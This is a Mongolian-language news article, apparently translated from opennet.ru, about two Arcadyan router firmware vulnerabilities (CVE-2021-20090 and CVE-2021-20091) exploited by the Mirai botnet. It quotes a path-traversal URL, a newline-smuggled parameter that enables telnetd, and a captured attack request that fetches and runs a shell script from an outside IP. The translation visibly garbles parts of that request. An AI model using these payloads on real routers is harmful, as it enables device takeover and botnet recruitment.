17 үйлдвэрлэгчид нөлөөлж буй гэрийн чиглүүлэгчид эмзэг байдал

Аркадян компанийн HTTP серверийн программыг ашигладаг гэрийн чиглүүлэгчдийн эсрэг сүлжээнд асар их халдлага бүртгэгдсэн байна. Төхөөрөмжүүдийг хянахын тулд үндсэн эрх бүхий дурын кодыг алсаас гүйцэтгэх боломжийг олгодог хоёр эмзэг байдлын хослолыг ашигладаг. Асуудал нь Arcadyan, ASUS, Buffalo-ийн нэлээд өргөн хүрээний ADSL чиглүүлэгчид, мөн Beeline брэндүүдээр хангагдсан төхөөрөмжүүдэд (асуудал нь Smart Box Flash дээр батлагдсан), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone болон бусад харилцаа холбооны операторууд. Энэ асуудал Arcadyan програм хангамжид 10 гаруй жилийн турш байсаар ирсэн бөгөөд энэ хугацаанд 20 өөр үйлдвэрлэгчээс дор хаяж 17 төхөөрөмжийн загвар руу шилжиж чадсан гэж тэмдэглэжээ.

Эхний эмзэг байдал болох CVE-2021-20090 нь ямар ч вэб интерфэйсийн скриптэд баталгаажуулалтгүйгээр нэвтрэх боломжийг олгодог. Эмзэг байдлын мөн чанар нь вэб интерфэйс дээр зураг, CSS файлууд болон JavaScript скриптүүдийг илгээдэг зарим сангууд нь баталгаажуулалтгүйгээр хандах боломжтой байдаг. Энэ тохиолдолд баталгаажуулалтгүйгээр нэвтрэх боломжтой сангуудыг анхны маск ашиглан шалгана. Үндсэн лавлах руу очих замд "../" тэмдэгтүүдийг зааж өгөхийг програм хангамж хориглосон боловч "..% 2f" хослолыг ашиглахыг алгассан. Тиймээс “http://192.168.1.1/images/..%2findex.htm” гэх мэт хүсэлт илгээхдээ хамгаалагдсан хуудсыг нээх боломжтой.

Хоёрдахь эмзэг байдал болох CVE-2021-20091 нь баталгаажуулсан хэрэглэгчдэд параметрт шинэ мөр байгаа эсэхийг шалгадаггүй apply_abstract.cgi скрипт рүү тусгайлан форматлагдсан параметрүүдийг илгээх замаар төхөөрөмжийн системийн тохиргоонд өөрчлөлт оруулах боломжийг олгодог. . Жишээлбэл, ping үйлдэл хийх үед халдагчид /tmp/etc/config/ тохиргооны файлыг үүсгэхдээ IP хаяг болон скриптийг шалгаж байгаа талбарт “192.168.1.2%0AARC_SYS_TelnetdEnable=1” утгыг зааж өгч болно. .glbcfg нь "AARC_SYS_TelnetdEnable=1" гэсэн мөрийг түүн рүү бичих бөгөөд энэ нь telnetd серверийг идэвхжүүлдэг бөгөөд энэ нь root эрхээр хязгааргүй тушаалын бүрхүүлд хандах боломжийг олгодог. Үүнтэй адилаар, AARC_SYS параметрийг тохируулснаар та систем дээрх дурын кодыг ажиллуулж болно. Эхний эмзэг байдал нь асуудалтай скриптийг “/images/..%2fapply_abstract.cgi” нэрээр нэвтэрч баталгаажуулалтгүйгээр ажиллуулах боломжтой болгодог.

Эмзэг байдлыг ашиглахын тулд халдагчид вэб интерфэйс ажиллаж байгаа сүлжээний порт руу хүсэлт илгээх боломжтой байх ёстой. Довтолгооны тархалтын динамикаас харахад олон операторууд дэмжлэг үзүүлэх үйлчилгээгээр асуудлыг оношлохыг хялбарчлахын тулд гадаад сүлжээнээс төхөөрөмждөө нэвтрэх эрхийг үлдээдэг. Хэрэв интерфэйс рүү нэвтрэх нь зөвхөн дотоод сүлжээнд хязгаарлагддаг бол "DNS дахин холбох" аргыг ашиглан гадны сүлжээнээс халдлага хийж болно. Mirai ботнетэд чиглүүлэгчийг холбоход эмзэг талууд аль хэдийн идэвхтэй ашиглагдаж байна: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Холболт: Хаах Хэрэглэгч-Агент: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_paddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

Эх сурвалж: opennet.ru

сэтгэгдэл нэмэх